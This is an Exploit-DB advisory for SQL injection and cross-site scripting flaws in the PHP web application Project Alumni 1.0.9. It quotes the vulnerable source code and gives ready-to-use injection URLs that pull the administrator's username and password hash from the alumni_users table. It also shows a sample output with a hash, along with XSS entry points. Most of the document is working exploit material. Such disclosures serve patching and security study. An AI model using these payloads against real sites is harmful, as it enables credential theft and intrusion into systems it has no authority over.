project alumni 1.0.9 - Cross-Site Scripting / SQL Injection

EDB-ID:

4655

CVE:

2007-6127 2007-6126

EDB Verified:

Author:

tomplixsee

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2007-11-24

Vulnerable App: 
project-alumni sql injection & xss
author : tomplixsee 
tomplixsee@yahoo.co.id

-------------------------------------------------------------------------------------------------------------
affected software version	: project alumni v1.0.9, v1.0.8, or lower??
download			: https://sourceforge.net/projects/project-alumni/


vulnerability
=============

1.sql injection
++++++++++++++++
condition: magic_quotes_gpc = off

vulnerable code on view.page.inc.php: 
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'"); 

reason: bad filtering
exploit:
http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1 

result example:
+---------------------------------------------------------------------------------------------------+------------------------------------------+
 |	Name   					 	|	Email		 |				 
+---------------------------------------------------------------------------------------------------+------------------------------------------+
 |	tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0	|	Not Available              |
+------------------------------------------------------------------------------------------------ --+------------------------------------------+
tomplixsee is admin's username and f25a2fc72690b780b2a14e140ef6a9e0 is md5 encrypt from admin's password.


vulnerable code on news.page.inc.php
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_class_news` WHERE `year` = '".$_GET['year']."'");

reason: bad filtering
exploit:
http://victim/path/index.php?act=news&year=2003' union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where ID='1

2.xss
++++++
vulnerable code:

________________________________________________________________________________
#/xml/index.php									#
#										#
#	<?php 									#
#	if(isset($_GET["year"])){						#
#		$year = $_GET["year"];						#
#	}									#
#	if($year=='FRND')							#
#		$yearText = "Friends of ".getConfigVal("schoolAbbr",2)." Alumni";		#
#	else									#
#		$yearText = "Class of $year";					#
#	?>									#
#	.....									#
#	<?php echo"$yearText";?>						#
#	.....									#
#										#
#exploit:									#
#http://victim/path/xml/index.php?year=<xss>					#
#_______________________________________________________________________________#
# view.page.inc.php								#
#										#
#	<?php if(!$_GET['year']) { ?>						#
#	....									#
#	<?php } else if ($_GET['year'] < getConfigVal("alumniStartYear",2)) { ?>#
#	....									#
#	<?php } else { ?>							#
#	<h2>Alumni for the Graduating Year of <?php echo $_GET['year'] ?></h2>	#
#										#
#exploit									#
#http://victim/path/index.php?act=view&year=<xss>				#
#_______________________________________________________________________________#


salam untuk:
anak-anak jaringan sukabirus, teman-teman di stt telkom, komunitas jasakom, 
sibalbal, crutz_ao, bidulux, akillers 179...........

# milw0rm.com [2007-11-24]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services